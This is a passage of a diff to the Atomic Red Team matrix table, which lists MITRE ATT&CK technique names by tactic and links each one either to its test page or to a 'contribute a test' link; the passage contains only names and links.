-| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Unix Shell](../../T1059.004/T1059.004.md) | [Cron](../../T1053.003/T1053.003.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
-| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [File Deletion](../../T1070.004/T1070.004.md) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | [HISTCONTROL](../../T1562.003/T1562.003.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | [Screen Capture](../../T1113/T1113.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | [Local Account](../../T1136.001/T1136.001.md) | | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Non-Standard Port](../../T1571/T1571.md) | |
-| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indicator Blocking](../../T1562.006/T1562.006.md) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
-| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
-| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Systemd Service](../../T1543.002/T1543.002.md) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
-| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Trap](../../T1546.005/T1546.005.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
+| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
